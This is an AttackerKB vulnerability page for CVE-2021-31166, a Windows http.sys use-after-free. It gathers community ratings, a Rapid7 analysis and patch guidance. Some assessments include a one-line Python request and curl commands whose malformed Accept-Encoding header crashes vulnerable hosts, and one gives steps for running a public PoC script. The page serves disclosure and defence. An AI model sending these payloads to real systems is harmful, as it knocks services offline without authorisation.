High
CVE-2021-31166
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2021-31166
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
HTTP Protocol Stack Remote Code Execution Vulnerability
Add Assessment
Ratings
-
Attacker ValueLow
-
ExploitabilityMedium
Technical Analysis
The vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.
The semi-annual channel versions are not that common in bigger organisations. This affected my rating on attacker value. I would argue , that most of them use the LTSC of older Windows versions. The attacker value is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.
Microsoft rates this vulnerability “Exploitation more likely”. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my Exploitability scoring towards Easy on this vulnerability.
Sources:
https://twitter.com/GossiTheDog/status/1392211087601410054
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueHigh
-
ExploitabilityMedium
Technical Analysis
A crash proof-of-concept (PoC) has been released for CVE-2021-31166. Rapid7 researchers have confirmed its veracity. The vulnerability exists in the Windows http.sys
driver, which is used to serve web requests. Windows Server 2004 and Windows Server 20H2, as well as Windows 10 20H2, are affected, as Windows 10 can be configured as a web server.
The PoC has been tested against a Windows 10 20H2 target. Verification of the PoC can replicated by following these steps:
- Download the most recent version of Windows 10 here
- Enable Internet Information Services in Windows Features
- Ensure your version of Python has the
requests
package by runningpip install requests
orpip3 install requests
- Run the PoC as described in the README:
python cve-2021-31166.py --target=<IP_ADDRESS>
CVE-2021-31166 is a memory corruption vulnerability. Memory corruption vulnerabilities may lack reliability when exploited at scale. Out of 2020’s 50 most notable active and impending threats, only one memory corruption vulnerability, SMBGhost, was exploited at scale, and even that distinction was pretty dubious. The SMBGhost exploit was preferred by threat actors for only a couple months before being deprioritized in favor of Mimikatz and EternalBlue. It can only be speculated why that happened, though many would conclude that it was due to the reliability of the particular exploit. More info on SMBGhost threat actor analysis can be found here.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCould you explain, why you rated the attacker value of this vulnerability higher than my assessment? I lowered the value because the windows version is not a common configuration in bigger organisations. I would argue, that they tend to use Windows LTSC versions.
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
According to Microsoft’s documentation, here are the affected platforms:
Windows Server, version 2004 (or 20H1) (Server Core installation),
Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
Windows Server, version 20H2 (Server Core Installation),
Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.
CVE-2021-31166
One Line
python -c “import requests; print(requests.get(’http://192.168.1.101/’, headers = {‘Accept-Encoding’: ‘pwn, pwned, tupaci, psevdoIT, krastavichar, *, ,’,}))”Proof:
M0r3
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31166
BR
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- windows 10 2004,
- windows 10 20h2,
- windows server 2004,
- windows server 20h2
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Description
On Tuesday, May 11, 2021, as part of their May Patch Tuesday advisory release, Microsoft published information on CVE-2021-31166, a high-severity remote code execution vulnerability in the Windows HTTP protocol stack. Successful exploitation requires a remote, unauthenticated attacker to send a specially crafted packet to a target server that uses the HTTP Protocol Stack (http.sys
) to process packets. Microsoft noted in their advisory that the vulnerability, which carries a CVSSv3 base score of 9.8, has the potential to be wormed (as many protocol vulnerabilities have potential to be).
Public proof-of-concept (PoC) exploit code that crashes a vulnerable target (but does not achieve remote code execution) has been available since May 16, 2021.
Affected products
Early information indicated that only the most recent versions of Windows were vulnerable and primarily affected web server implementations of http.sys
. On Friday, May 21, 2021, however, security community members noted that Windows Remote Management, or WinRM, is also vulnerable due to its use of the http.sys
driver. On Saturday, May 22, 2021, Windows 10 21H1 was also reported as being vulnerable. Later in the day, it was further noted that any servers running with the Microsoft-HTTPAPI/2.0
header may be vulnerable.
- Windows 10 Version 21H1
- Windows Server, version 20H2 (Server Core Installation)
- Windows 10 Version 20H2 for ARM64-based Systems
- Windows 10 Version 20H2 for 32-bit Systems
- Windows 10 Version 20H2 for x64-based Systems
- Windows Server, version 2004 (Server Core installation)
- Windows 10 Version 2004 for x64-based Systems
- Windows 10 Version 2004 for ARM64-based Systems
- Windows 10 Version 2004 for 32-bit Systems
Rapid7 analysis
CVE-2021-31166 is a use-after-free (memory corruption) vulnerability whose exploitation requires manipulation of kernel memory. The realization that more Windows 10 implementations beyond IIS are vulnerable raises the alarm level slightly given the expanded attack surface area; however, reliable weaponization of CVE-2021-31166 for code execution is non-trivial, and exploitation for code execution is unlikely to occur quickly (and even less likely to occur quickly at scale). With that said, the risk is worth taking seriously for those running on more recent Windows update streams: The time between vulnerability disclosure and reliable attacks has decreased significantly over the past year, and defenders are detecting a comparatively high proportion of attacks perpetrated by sophisticated adversaries.
Rapid7 researchers were able to reproduce a crash against a Windows 10 target configured as a web server and as a WinRM-enabled host (shown below).
wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist," * Trying 192.168.56.4... * TCP_NODELAY set * Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0) > GET / HTTP/1.1 > Host: 192.168.56.4:5985 > User-Agent: curl/7.64.1 > Accept: */* > Accept-Encoding: does-not-exist, > < HTTP/1.1 404 Not Found < Content-Type: text/html; charset=us-ascii < Server: Microsoft-HTTPAPI/2.0 < Date: Fri, 21 May 2021 20:48:16 GMT < Connection: close < Content-Length: 315 < <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>Not Found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD> <BODY><h2>Not Found</h2> <hr><p>HTTP Error 404. The requested resource is not found.</p> </BODY></HTML> * Closing connection 0 wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,," * Trying 192.168.56.4... * TCP_NODELAY set * Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0) > GET / HTTP/1.1 > Host: 192.168.56.4:5985 > User-Agent: curl/7.64.1 > Accept: */* > Accept-Encoding: does-not-exist,, > * Recv failure: Connection reset by peer * Closing connection 0 curl: (56) Recv failure: Connection reset by peer wvu@kharak:~$
When a malformed Accept-Encoding
header is sent in the request, the target immediately crashes, and the connection is reset.
Guidance
KB5003173 provides guidance on patching CVE-2021-31166. Patches may be downloaded directly from the Microsoft Update Catalog.
References
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: